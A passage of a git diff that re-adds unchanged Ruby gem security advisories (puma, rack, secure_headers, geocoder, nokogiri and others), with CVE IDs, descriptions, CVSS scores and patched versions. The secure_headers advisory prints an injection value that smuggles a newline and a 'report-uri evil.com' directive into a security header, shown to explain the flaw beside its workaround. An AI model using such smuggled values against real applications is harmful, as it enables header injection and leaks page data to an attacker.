+  title: json-jwt improper input validation due to lack of element count when splitting
+    string
+  description: |
+    The json-jwt gem before 1.11.0 for Ruby lacks an element count during
+    the splitting of a JWE string.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.11.0"
+---
diff --git a/advisories/_posts/2019-11-15-CVE-2019-18978.md b/advisories/_posts/2019-11-15-CVE-2019-18978.md
index 05a974d4..3a5bce9b 100644
--- a/advisories/_posts/2019-11-15-CVE-2019-18978.md
+++ b/advisories/_posts/2019-11-15-CVE-2019-18978.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2019-18978 (rack-cors): rack-cors directory traversal via path'
-comments: false
-categories:
-- rack-cors
-advisory:
-  gem: rack-cors
-  cve: 2019-18978
-  ghsa: pf8f-w267-mq2h
-  url: https://github.com/cyu/rack-cors/commit/e4d4fc362a4315808927011cbe5afcfe5486f17d
-  title: rack-cors directory traversal via path
-  date: 2019-11-15
-  description: |
-    An issue was discovered in the rack-cors (aka Rack CORS Middleware) gem
-    before 1.0.4 for Ruby. It allows ../ directory traversal to access private resources
-    because resource matching does not ensure that pathnames are in a canonical format.
-  cvss_v3: 5.3
-  patched_versions:
-  - ">= 1.0.4"
----
+---
+layout: advisory
+title: 'CVE-2019-18978 (rack-cors): rack-cors directory traversal via path'
+comments: false
+categories:
+- rack-cors
+advisory:
+  gem: rack-cors
+  cve: 2019-18978
+  ghsa: pf8f-w267-mq2h
+  url: https://github.com/cyu/rack-cors/commit/e4d4fc362a4315808927011cbe5afcfe5486f17d
+  title: rack-cors directory traversal via path
+  date: 2019-11-15
+  description: |
+    An issue was discovered in the rack-cors (aka Rack CORS Middleware) gem
+    before 1.0.4 for Ruby. It allows ../ directory traversal to access private resources
+    because resource matching does not ensure that pathnames are in a canonical format.
+  cvss_v3: 5.3
+  patched_versions:
+  - ">= 1.0.4"
+---
diff --git a/advisories/_posts/2019-12-05-CVE-2019-16770.md b/advisories/_posts/2019-12-05-CVE-2019-16770.md
index fdcb9603..5c8a0e44 100644
--- a/advisories/_posts/2019-12-05-CVE-2019-16770.md
+++ b/advisories/_posts/2019-12-05-CVE-2019-16770.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2019-16770 (puma): Keepalive thread overload/DoS in puma'
-comments: false
-categories:
-- puma
-advisory:
-  gem: puma
-  cve: 2019-16770
-  ghsa: 7xx3-m584-x994
-  url: https://github.com/puma/puma/security/advisories/GHSA-7xx3-m584-x994
-  date: 2019-12-05
-  title: Keepalive thread overload/DoS in puma
-  description: |
-    A poorly-behaved client could use keepalive requests to monopolize
-    Puma's reactor and create a denial of service attack.
-
-    If more keepalive connections to Puma are opened than there are
-    threads available, additional connections will wait permanently if
-    the attacker sends requests frequently enough.
-  cvss_v3: 8.8
-  cvss_v2: 6.8
-  patched_versions:
-  - "~> 3.12.2"
-  - ">= 4.3.1"
----
+---
+layout: advisory
+title: 'CVE-2019-16770 (puma): Keepalive thread overload/DoS in puma'
+comments: false
+categories:
+- puma
+advisory:
+  gem: puma
+  cve: 2019-16770
+  ghsa: 7xx3-m584-x994
+  url: https://github.com/puma/puma/security/advisories/GHSA-7xx3-m584-x994
+  date: 2019-12-05
+  title: Keepalive thread overload/DoS in puma
+  description: |
+    A poorly-behaved client could use keepalive requests to monopolize
+    Puma's reactor and create a denial of service attack.
+
+    If more keepalive connections to Puma are opened than there are
+    threads available, additional connections will wait permanently if
+    the attacker sends requests frequently enough.
+  cvss_v3: 8.8
+  cvss_v2: 6.8
+  patched_versions:
+  - "~> 3.12.2"
+  - ">= 4.3.1"
+---
diff --git a/advisories/_posts/2019-12-16-CVE-2019-16779.md b/advisories/_posts/2019-12-16-CVE-2019-16779.md
index 839f1e91..64a15608 100644
--- a/advisories/_posts/2019-12-16-CVE-2019-16779.md
+++ b/advisories/_posts/2019-12-16-CVE-2019-16779.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2019-16779 (excon): Race condition when using persistent connections'
-comments: false
-categories:
-- excon
-advisory:
-  gem: excon
-  cve: 2019-16779
-  ghsa: q58g-455p-8vw9
-  url: https://github.com/excon/excon/security/advisories/GHSA-q58g-455p-8vw9
-  date: 2019-12-16
-  title: Race condition when using persistent connections
-  description: |
-    There was a race condition around persistent connections, where a connection
-    which is interrupted (such as by a timeout) would leave data on the socket.
-    Subsequent requests would then read this data, returning content from the
-    previous response. The race condition window appears to be short, and it
-    would be difficult to purposefully exploit this.
-
-    Users can workaround the problem by disabling persistent connections, though
-    this may cause performance implications.
-  cvss_v3: 5.8
-  patched_versions:
-  - ">= 0.71.0"
-  related:
-    url:
-    - https://github.com/excon/excon/commit/ccb57d7a422f020dc74f1de4e8fb505ab46d8a29
----
+---
+layout: advisory
+title: 'CVE-2019-16779 (excon): Race condition when using persistent connections'
+comments: false
+categories:
+- excon
+advisory:
+  gem: excon
+  cve: 2019-16779
+  ghsa: q58g-455p-8vw9
+  url: https://github.com/excon/excon/security/advisories/GHSA-q58g-455p-8vw9
+  date: 2019-12-16
+  title: Race condition when using persistent connections
+  description: |
+    There was a race condition around persistent connections, where a connection
+    which is interrupted (such as by a timeout) would leave data on the socket.
+    Subsequent requests would then read this data, returning content from the
+    previous response. The race condition window appears to be short, and it
+    would be difficult to purposefully exploit this.
+
+    Users can workaround the problem by disabling persistent connections, though
+    this may cause performance implications.
+  cvss_v3: 5.8
+  patched_versions:
+  - ">= 0.71.0"
+  related:
+    url:
+    - https://github.com/excon/excon/commit/ccb57d7a422f020dc74f1de4e8fb505ab46d8a29
+---
diff --git a/advisories/_posts/2019-12-18-CVE-2019-16782.md b/advisories/_posts/2019-12-18-CVE-2019-16782.md
index 23d639d4..15f42619 100644
--- a/advisories/_posts/2019-12-18-CVE-2019-16782.md
+++ b/advisories/_posts/2019-12-18-CVE-2019-16782.md
@@ -1,39 +1,39 @@
----
-layout: advisory
-title: 'CVE-2019-16782 (rack): Possible information leak / session hijack vulnerability'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2019-16782
-  ghsa: hrqr-hxpp-chr3
-  url: https://github.com/rack/rack/security/advisories/GHSA-hrqr-hxpp-chr3
-  date: 2019-12-18
-  title: Possible information leak / session hijack vulnerability
-  description: |
-    There's a possible information leak / session hijack vulnerability in Rack.
-
-    Attackers may be able to find and hijack sessions by using timing attacks
-    targeting the session id. Session ids are usually stored and indexed in a
-    database that uses some kind of scheme for speeding up lookups of that
-    session id. By carefully measuring the amount of time it takes to look up
-    a session, an attacker may be able to find a valid session id and hijack
-    the session.
-
-    The session id itself may be generated randomly, but the way the session is
-    indexed by the backing store does not use a secure comparison.
-
-    Impact:
-
-    The session id stored in a cookie is the same id that is used when querying
-    the backing session storage engine.  Most storage mechanisms (for example a
-    database) use some sort of indexing in order to speed up the lookup of that
-    id.  By carefully timing requests and session lookup failures, an attacker
-    may be able to perform a timing attack to determine an existing session id
-    and hijack that session.
-  cvss_v3: 6.3
-  patched_versions:
-  - "~> 1.6.12"
-  - ">= 2.0.8"
----
+---
+layout: advisory
+title: 'CVE-2019-16782 (rack): Possible information leak / session hijack vulnerability'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2019-16782
+  ghsa: hrqr-hxpp-chr3
+  url: https://github.com/rack/rack/security/advisories/GHSA-hrqr-hxpp-chr3
+  date: 2019-12-18
+  title: Possible information leak / session hijack vulnerability
+  description: |
+    There's a possible information leak / session hijack vulnerability in Rack.
+
+    Attackers may be able to find and hijack sessions by using timing attacks
+    targeting the session id. Session ids are usually stored and indexed in a
+    database that uses some kind of scheme for speeding up lookups of that
+    session id. By carefully measuring the amount of time it takes to look up
+    a session, an attacker may be able to find a valid session id and hijack
+    the session.
+
+    The session id itself may be generated randomly, but the way the session is
+    indexed by the backing store does not use a secure comparison.
+
+    Impact:
+
+    The session id stored in a cookie is the same id that is used when querying
+    the backing session storage engine.  Most storage mechanisms (for example a
+    database) use some sort of indexing in order to speed up the lookup of that
+    id.  By carefully timing requests and session lookup failures, an attacker
+    may be able to perform a timing attack to determine an existing session id
+    and hijack that session.
+  cvss_v3: 6.3
+  patched_versions:
+  - "~> 1.6.12"
+  - ">= 2.0.8"
+---
diff --git a/advisories/_posts/2019-12-26-CVE-2019-19919.md b/advisories/_posts/2019-12-26-CVE-2019-19919.md
index 81b105dd..4a335d7a 100644
--- a/advisories/_posts/2019-12-26-CVE-2019-19919.md
+++ b/advisories/_posts/2019-12-26-CVE-2019-19919.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2019-19919 (bootstrap-wysihtml5-rails): Prototype Pollution in handlebars'
-comments: false
-categories:
-- bootstrap-wysihtml5-rails
-advisory:
-  gem: bootstrap-wysihtml5-rails
-  cve: 2019-19919
-  ghsa: w457-6q6x-cgp9
-  url: https://github.com/advisories/GHSA-w457-6q6x-cgp9
-  title: Prototype Pollution in handlebars
-  date: 2019-12-26
-  description: |
-    The bootstrap-wysihtml5-rails gem includes the vendored JavaScript library 'handlebars.js'.
-    Versions 0.3.3.7-0.3.3.8 include handlebars 3.0.2, and versions 0.3.3.5-0.3.3.6 include handlebars 1.3.0.
-
-    Versions Affected: 0.3.3.5-0.3.3.8
-    Not affected: < 0.3.3.5
-    Fixed Versions: None
-
-    Versions of handlebars prior to 3.0.8 or 4.3.0 are vulnerable to Prototype Pollution leading to Remote Code Execution.
-    Templates may alter an Objects' __proto__ and __defineGetter__ properties, which may allow an attacker to execute
-    arbitrary code through crafted payloads.
-  cvss_v3: 9.8
-  unaffected_versions:
-  - "< 0.3.3.5"
----
+---
+layout: advisory
+title: 'CVE-2019-19919 (bootstrap-wysihtml5-rails): Prototype Pollution in handlebars'
+comments: false
+categories:
+- bootstrap-wysihtml5-rails
+advisory:
+  gem: bootstrap-wysihtml5-rails
+  cve: 2019-19919
+  ghsa: w457-6q6x-cgp9
+  url: https://github.com/advisories/GHSA-w457-6q6x-cgp9
+  title: Prototype Pollution in handlebars
+  date: 2019-12-26
+  description: |
+    The bootstrap-wysihtml5-rails gem includes the vendored JavaScript library 'handlebars.js'.
+    Versions 0.3.3.7-0.3.3.8 include handlebars 3.0.2, and versions 0.3.3.5-0.3.3.6 include handlebars 1.3.0.
+
+    Versions Affected: 0.3.3.5-0.3.3.8
+    Not affected: < 0.3.3.5
+    Fixed Versions: None
+
+    Versions of handlebars prior to 3.0.8 or 4.3.0 are vulnerable to Prototype Pollution leading to Remote Code Execution.
+    Templates may alter an Objects' __proto__ and __defineGetter__ properties, which may allow an attacker to execute
+    arbitrary code through crafted payloads.
+  cvss_v3: 9.8
+  unaffected_versions:
+  - "< 0.3.3.5"
+---
diff --git a/advisories/_posts/2020-01-09-CVE-2014-3211.md b/advisories/_posts/2020-01-09-CVE-2014-3211.md
index b384ab5f..0de7cf9c 100644
--- a/advisories/_posts/2020-01-09-CVE-2014-3211.md
+++ b/advisories/_posts/2020-01-09-CVE-2014-3211.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2014-3211 (publify_core): Publify vulnerable to DoS attack'
-comments: false
-categories:
-- publify_core
-advisory:
-  gem: publify_core
-  cve: 2014-3211
-  ghsa: vq74-9583-hrm4
-  url: https://github.com/publify/publify/releases/tag/v8.0.2
-  title: Publify vulnerable to DoS attack
-  date: 2020-01-09
-  description: 'Publify before 8.0.2 is vulnerable to a Denial of Service attack
-
-    '
-  cvss_v2: 5.0
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 8.0.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2014-3211
-    - https://cve.report/CVE-2014-3211
-    - https://github.com/publify/publify/releases/tag/v8.0.2
-    - https://publify.github.io
-    - https://rubygems.org/gems/publify_core
-    - https://rubygems.org/gems/typo
-    - https://github.com/advisories/GHSA-vq74-9583-hrm4
-  notes: |
-    Found "Formerly known as Typo" at https://github.com/publify/publify
-    FYI: Gem publify_core oldest release is 9.0.0.pre1 (11/13/2016);
----
+---
+layout: advisory
+title: 'CVE-2014-3211 (publify_core): Publify vulnerable to DoS attack'
+comments: false
+categories:
+- publify_core
+advisory:
+  gem: publify_core
+  cve: 2014-3211
+  ghsa: vq74-9583-hrm4
+  url: https://github.com/publify/publify/releases/tag/v8.0.2
+  title: Publify vulnerable to DoS attack
+  date: 2020-01-09
+  description: 'Publify before 8.0.2 is vulnerable to a Denial of Service attack
+
+    '
+  cvss_v2: 5.0
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 8.0.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-3211
+    - https://cve.report/CVE-2014-3211
+    - https://github.com/publify/publify/releases/tag/v8.0.2
+    - https://publify.github.io
+    - https://rubygems.org/gems/publify_core
+    - https://rubygems.org/gems/typo
+    - https://github.com/advisories/GHSA-vq74-9583-hrm4
+  notes: |
+    Found "Formerly known as Typo" at https://github.com/publify/publify
+    FYI: Gem publify_core oldest release is 9.0.0.pre1 (11/13/2016);
+---
diff --git a/advisories/_posts/2020-01-23-CVE-2020-5216.md b/advisories/_posts/2020-01-23-CVE-2020-5216.md
index 21bd5c03..dca69430 100644
--- a/advisories/_posts/2020-01-23-CVE-2020-5216.md
+++ b/advisories/_posts/2020-01-23-CVE-2020-5216.md
@@ -1,57 +1,57 @@
----
-layout: advisory
-title: 'CVE-2020-5216 (secure_headers): secure_headers header injection due to newline'
-comments: false
-categories:
-- secure_headers
-advisory:
-  gem: secure_headers
-  cve: 2020-5216
-  ghsa: w978-rmpf-qmwg
-  url: https://github.com/twitter/secure_headers/security/advisories/GHSA-w978-rmpf-qmwg
-  date: 2020-01-23
-  title: secure_headers header injection due to newline
-  description: |
-    If user-supplied input was passed into append/override_content_security_policy_directives,
-    a newline could be injected leading to limited header injection.
-
-    Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy
-    header with the remaining value of the original string. It will continue to create new headers
-    for each newline.
-
-    e.g.
-
-    ```
-    override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])
-    ```
-
-    would result in
-
-    ```
-    Content-Security-Policy: ... script-src: mycdn.com
-    Content-Security-Policy: injected
-    Content-Security-Policy: rest-of-the-header
-    ```
-
-    CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:
-
-    ```
-    override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"])
-    ```
-
-    ```
-    Content-Security-Policy: ... script-src: mycdn.com
-    Content-Security-Policy: default-src 'none'; report-uri evil.com
-    Content-Security-Policy: rest-of-the-header
-    ```
-
-    Workarounds
-    ```
-    override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")])
-    ```
-  cvss_v3: 4.4
-  patched_versions:
-  - "~> 3.9"
-  - "~> 5.2"
-  - ">= 6.3.0"
----
+---
+layout: advisory
+title: 'CVE-2020-5216 (secure_headers): secure_headers header injection due to newline'
+comments: false
+categories:
+- secure_headers
+advisory:
+  gem: secure_headers
+  cve: 2020-5216
+  ghsa: w978-rmpf-qmwg
+  url: https://github.com/twitter/secure_headers/security/advisories/GHSA-w978-rmpf-qmwg
+  date: 2020-01-23
+  title: secure_headers header injection due to newline
+  description: |
+    If user-supplied input was passed into append/override_content_security_policy_directives,
+    a newline could be injected leading to limited header injection.
+
+    Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy
+    header with the remaining value of the original string. It will continue to create new headers
+    for each newline.
+
+    e.g.
+
+    ```
+    override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])
+    ```
+
+    would result in
+
+    ```
+    Content-Security-Policy: ... script-src: mycdn.com
+    Content-Security-Policy: injected
+    Content-Security-Policy: rest-of-the-header
+    ```
+
+    CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:
+
+    ```
+    override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"])
+    ```
+
+    ```
+    Content-Security-Policy: ... script-src: mycdn.com
+    Content-Security-Policy: default-src 'none'; report-uri evil.com
+    Content-Security-Policy: rest-of-the-header
+    ```
+
+    Workarounds
+    ```
+    override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")])
+    ```
+  cvss_v3: 4.4
+  patched_versions:
+  - "~> 3.9"
+  - "~> 5.2"
+  - ">= 6.3.0"
+---
diff --git a/advisories/_posts/2020-01-23-CVE-2020-5217.md b/advisories/_posts/2020-01-23-CVE-2020-5217.md
index c11742bc..51ea38b6 100644
--- a/advisories/_posts/2020-01-23-CVE-2020-5217.md
+++ b/advisories/_posts/2020-01-23-CVE-2020-5217.md
@@ -1,47 +1,47 @@
----
-layout: advisory
-title: 'CVE-2020-5217 (secure_headers): secure_headers directive injection using semicolon'
-comments: false
-categories:
-- secure_headers
-advisory:
-  gem: secure_headers
-  cve: 2020-5217
-  ghsa: xq52-rv6w-397c
-  url: https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c
-  date: 2020-01-23
-  title: secure_headers directive injection using semicolon
-  description: |
-    If user-supplied input was passed into append/override_content_security_policy_directives,
-    a semicolon could be injected leading to directive injection.
-
-    This could be used to e.g. override a script-src directive. Duplicate directives are ignored
-    and the first one wins. The directives in secure_headers are sorted alphabetically so they
-    pretty much all come before script-src. A previously undefined directive would receive a value
-    even if SecureHeaders::OPT_OUT was supplied.
-
-    The fixed versions will silently convert the semicolons to spaces and emit a deprecation warning
-    when this happens. This will result in innocuous browser console messages if being
-    exploited/accidentally used. In future releases, we will raise application errors resulting in
-    500s.
-
-    > Duplicate script-src directives detected. All but the first instance will be ignored.
-
-    See https://www.w3.org/TR/CSP3/#parse-serialized-policy
-
-    > Note: In this case, the user agent SHOULD notify developers that a duplicate directive was
-    > ignored. A console warning might be appropriate, for example.
-
-    # Workarounds
-
-    If you are passing user input into the above methods, you could filter out the input:
-
-    ```
-    override_content_security_policy_directives(:frame_src, [user_input.gsub(";", " ")])
-    ```
-  cvss_v3: 4.4
-  patched_versions:
-  - "~> 3.8"
-  - "~> 5.1"
-  - ">= 6.2.0"
----
+---
+layout: advisory
+title: 'CVE-2020-5217 (secure_headers): secure_headers directive injection using semicolon'
+comments: false
+categories:
+- secure_headers
+advisory:
+  gem: secure_headers
+  cve: 2020-5217
+  ghsa: xq52-rv6w-397c
+  url: https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c
+  date: 2020-01-23
+  title: secure_headers directive injection using semicolon
+  description: |
+    If user-supplied input was passed into append/override_content_security_policy_directives,
+    a semicolon could be injected leading to directive injection.
+
+    This could be used to e.g. override a script-src directive. Duplicate directives are ignored
+    and the first one wins. The directives in secure_headers are sorted alphabetically so they
+    pretty much all come before script-src. A previously undefined directive would receive a value
+    even if SecureHeaders::OPT_OUT was supplied.
+
+    The fixed versions will silently convert the semicolons to spaces and emit a deprecation warning
+    when this happens. This will result in innocuous browser console messages if being
+    exploited/accidentally used. In future releases, we will raise application errors resulting in
+    500s.
+
+    > Duplicate script-src directives detected. All but the first instance will be ignored.
+
+    See https://www.w3.org/TR/CSP3/#parse-serialized-policy
+
+    > Note: In this case, the user agent SHOULD notify developers that a duplicate directive was
+    > ignored. A console warning might be appropriate, for example.
+
+    # Workarounds
+
+    If you are passing user input into the above methods, you could filter out the input:
+
+    ```
+    override_content_security_policy_directives(:frame_src, [user_input.gsub(";", " ")])
+    ```
+  cvss_v3: 4.4
+  patched_versions:
+  - "~> 3.8"
+  - "~> 5.1"
+  - ">= 6.2.0"
+---
diff --git a/advisories/_posts/2020-01-25-CVE-2020-7981.md b/advisories/_posts/2020-01-25-CVE-2020-7981.md
index 72cf627c..14e492c2 100644
--- a/advisories/_posts/2020-01-25-CVE-2020-7981.md
+++ b/advisories/_posts/2020-01-25-CVE-2020-7981.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2020-7981 (geocoder): Geocoder gem for Ruby contains possible SQL injection
-  vulnerability'
-comments: false
-categories:
-- geocoder
-advisory:
-  gem: geocoder
-  cve: 2020-7981
-  ghsa: 864j-6qpp-cmrr
-  url: https://github.com/alexreisner/geocoder/blob/master/CHANGELOG.md#161-2020-jan-23
-  title: Geocoder gem for Ruby contains possible SQL injection vulnerability
-  date: 2020-01-25
-  description: |
-    sql.rb in Geocoder allows Boolean-based SQL injection when within_bounding_box
-    is used in conjunction with untrusted sw_lat, sw_lng, ne_lat, or ne_lng data.
-  cvss_v2: 7.5
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.6.1"
-  related:
-    url:
-    - https://github.com/alexreisner/geocoder/compare/v1.6.0...v1.6.1
-    - https://github.com/alexreisner/geocoder/commit/dcdc3d8675411edce3965941a2ca7c441ca48613
----
+---
+layout: advisory
+title: 'CVE-2020-7981 (geocoder): Geocoder gem for Ruby contains possible SQL injection
+  vulnerability'
+comments: false
+categories:
+- geocoder
+advisory:
+  gem: geocoder
+  cve: 2020-7981
+  ghsa: 864j-6qpp-cmrr
+  url: https://github.com/alexreisner/geocoder/blob/master/CHANGELOG.md#161-2020-jan-23
+  title: Geocoder gem for Ruby contains possible SQL injection vulnerability
+  date: 2020-01-25
+  description: |
+    sql.rb in Geocoder allows Boolean-based SQL injection when within_bounding_box
+    is used in conjunction with untrusted sw_lat, sw_lng, ne_lat, or ne_lng data.
+  cvss_v2: 7.5
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.6.1"
+  related:
+    url:
+    - https://github.com/alexreisner/geocoder/compare/v1.6.0...v1.6.1
+    - https://github.com/alexreisner/geocoder/commit/dcdc3d8675411edce3965941a2ca7c441ca48613
+---
diff --git a/advisories/_posts/2020-02-10-CVE-2020-5241.md b/advisories/_posts/2020-02-10-CVE-2020-5241.md
index 7aeefd96..0ccb53bc 100644
--- a/advisories/_posts/2020-02-10-CVE-2020-5241.md
+++ b/advisories/_posts/2020-02-10-CVE-2020-5241.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2020-5241 (matestack-ui-core): matestack-ui-core is vulnerable to XSS/Script
-  injection'
-comments: false
-categories:
-- matestack-ui-core
-advisory:
-  gem: matestack-ui-core
-  cve: 2020-5241
-  ghsa: 3jqw-vv45-mjhh
-  url: https://github.com/matestack/matestack-ui-core/security/advisories/GHSA-3jqw-vv45-mjhh
-  title: matestack-ui-core is vulnerable to XSS/Script injection
-  date: 2020-02-10
-  description: |
-    matestack-ui-core does not excape strings by default and does not cover this in the docs.
-    matestack-ui-core should escape strings by default in order to prevent XSS/Script injection vulnerability.
-    v0.7.4 fixes that by escaping strings by default.
-  cvss_v2: 10.0
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 0.7.4"
----
+---
+layout: advisory
+title: 'CVE-2020-5241 (matestack-ui-core): matestack-ui-core is vulnerable to XSS/Script
+  injection'
+comments: false
+categories:
+- matestack-ui-core
+advisory:
+  gem: matestack-ui-core
+  cve: 2020-5241
+  ghsa: 3jqw-vv45-mjhh
+  url: https://github.com/matestack/matestack-ui-core/security/advisories/GHSA-3jqw-vv45-mjhh
+  title: matestack-ui-core is vulnerable to XSS/Script injection
+  date: 2020-02-10
+  description: |
+    matestack-ui-core does not excape strings by default and does not cover this in the docs.
+    matestack-ui-core should escape strings by default in order to prevent XSS/Script injection vulnerability.
+    v0.7.4 fixes that by escaping strings by default.
+  cvss_v2: 10.0
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 0.7.4"
+---
diff --git a/advisories/_posts/2020-02-12-CVE-2020-7595.md b/advisories/_posts/2020-02-12-CVE-2020-7595.md
index 56058022..8109c9c0 100644
--- a/advisories/_posts/2020-02-12-CVE-2020-7595.md
+++ b/advisories/_posts/2020-02-12-CVE-2020-7595.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2020-7595 (nokogiri): libxml2 2.9.10 has an infinite loop in a certain
-  end-of-file situation'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2020-7595
-  ghsa: 7553-jr98-vx47
-  url: https://github.com/sparklemotion/nokogiri/issues/1992
-  title: libxml2 2.9.10 has an infinite loop in a certain end-of-file situation
-  date: 2020-02-12
-  description: |2
-
-    Nokogiri has backported the patch for CVE-2020-7595 into its vendored version
-    of libxml2, and released this as v1.10.8
-
-    CVE-2020-7595 has not yet been addressed in an upstream libxml2 release, and
-    so Nokogiri versions <= v1.10.7 are vulnerable.
-  cvss_v2: 5.0
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.10.8"
----
+---
+layout: advisory
+title: 'CVE-2020-7595 (nokogiri): libxml2 2.9.10 has an infinite loop in a certain
+  end-of-file situation'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2020-7595
+  ghsa: 7553-jr98-vx47
+  url: https://github.com/sparklemotion/nokogiri/issues/1992
+  title: libxml2 2.9.10 has an infinite loop in a certain end-of-file situation
+  date: 2020-02-12
+  description: |2
+
+    Nokogiri has backported the patch for CVE-2020-7595 into its vendored version
+    of libxml2, and released this as v1.10.8
+
+    CVE-2020-7595 has not yet been addressed in an upstream libxml2 release, and
+    so Nokogiri versions <= v1.10.7 are vulnerable.
+  cvss_v2: 5.0
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.10.8"
+---
diff --git a/advisories/_posts/2020-02-14-CVE-2019-10780.md b/advisories/_posts/2020-02-14-CVE-2019-10780.md
index 9ac2e600..1ad01398 100644
--- a/advisories/_posts/2020-02-14-CVE-2019-10780.md
+++ b/advisories/_posts/2020-02-14-CVE-2019-10780.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2019-10780 (bibtex-ruby): OS command injection in BibTeX-Ruby'
-comments: false
-categories:
-- bibtex-ruby
-advisory:
-  gem: bibtex-ruby
-  cve: 2019-10780
-  ghsa: c5r5-7pfh-6qg6
-  url: https://github.com/advisories/GHSA-c5r5-7pfh-6qg6
-  date: 2020-02-14
-  title: OS command injection in BibTeX-Ruby
-  description: |
-    BibTeX-ruby before 5.1.0 allows shell command injection due to unsanitized
-    user input being passed directly to the built-in Ruby Kernel.open method through
-    BibTeX.open.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 5.1.0"
----
+---
+layout: advisory
+title: 'CVE-2019-10780 (bibtex-ruby): OS command injection in BibTeX-Ruby'
+comments: false
+categories:
+- bibtex-ruby
+advisory:
+  gem: bibtex-ruby
+  cve: 2019-10780
+  ghsa: c5r5-7pfh-6qg6
+  url: https://github.com/advisories/GHSA-c5r5-7pfh-6qg6
+  date: 2020-02-14
+  title: OS command injection in BibTeX-Ruby
+  description: |
+    BibTeX-ruby before 5.1.0 allows shell command injection due to unsanitized
+    user input being passed directly to the built-in Ruby Kernel.open method through
+    BibTeX.open.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 5.1.0"
+---
diff --git a/advisories/_posts/2020-02-27-CVE-2020-5247.md b/advisories/_posts/2020-02-27-CVE-2020-5247.md
index ba57df14..e4ce24f7 100644
--- a/advisories/_posts/2020-02-27-CVE-2020-5247.md
+++ b/advisories/_posts/2020-02-27-CVE-2020-5247.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2020-5247 (puma): HTTP Response Splitting vulnerability in puma'
-comments: false
-categories:
-- puma
-advisory:
-  gem: puma
-  cve: 2020-5247
-  ghsa: 84j7-475p-hp8v
-  url: https://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v
-  date: 2020-02-27
-  title: HTTP Response Splitting vulnerability in puma
-  description: |
-    If an application using Puma allows untrusted input in a response header,
-    an attacker can use newline characters (i.e. CR, LF) to end the header and
-    inject malicious content, such as additional headers or an entirely new
-    response body. This vulnerability is known as HTTP Response Splitting.
-
-    While not an attack in itself, response splitting is a vector for several
-    other attacks, such as cross-site scripting (XSS).
-  cvss_v3: 6.5
-  patched_versions:
-  - "~> 3.12.4"
-  - ">= 4.3.3"
-  related:
-    cve:
-    - 2019-16254
----
+---
+layout: advisory
+title: 'CVE-2020-5247 (puma): HTTP Response Splitting vulnerability in puma'
+comments: false
+categories:
+- puma
+advisory:
+  gem: puma
+  cve: 2020-5247
+  ghsa: 84j7-475p-hp8v
+  url: https://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v
+  date: 2020-02-27
+  title: HTTP Response Splitting vulnerability in puma
+  description: |
+    If an application using Puma allows untrusted input in a response header,
+    an attacker can use newline characters (i.e. CR, LF) to end the header and
+    inject malicious content, such as additional headers or an entirely new
+    response body. This vulnerability is known as HTTP Response Splitting.
+
+    While not an attack in itself, response splitting is a vector for several
+    other attacks, such as cross-site scripting (XSS).
+  cvss_v3: 6.5
+  patched_versions:
+  - "~> 3.12.4"
+  - ">= 4.3.3"
+  related:
+    cve:
+    - 2019-16254
+---
diff --git a/advisories/_posts/2020-03-03-CVE-2020-5249.md b/advisories/_posts/2020-03-03-CVE-2020-5249.md
index d31f91f9..bc3d4995 100644
--- a/advisories/_posts/2020-03-03-CVE-2020-5249.md
+++ b/advisories/_posts/2020-03-03-CVE-2020-5249.md
@@ -1,40 +1,40 @@
----
-layout: advisory
-title: 'CVE-2020-5249 (puma): HTTP Response Splitting (Early Hints) in Puma'
-comments: false
-categories:
-- puma
-advisory:
-  gem: puma
-  cve: 2020-5249
-  ghsa: 33vf-4xgg-9r58
-  url: https://github.com/puma/puma/security/advisories/GHSA-33vf-4xgg-9r58
-  date: 2020-03-03
-  title: HTTP Response Splitting (Early Hints) in Puma
-  description: |
-    ### Impact
-    If an application using Puma allows untrusted input in an early-hints header,
-    an attacker can use a carriage return character to end the header and inject
-    malicious content, such as additional headers or an entirely new response body.
-    This vulnerability is known as [HTTP Response
-    Splitting](https://owasp.org/www-community/attacks/HTTP_Response_Splitting)
-
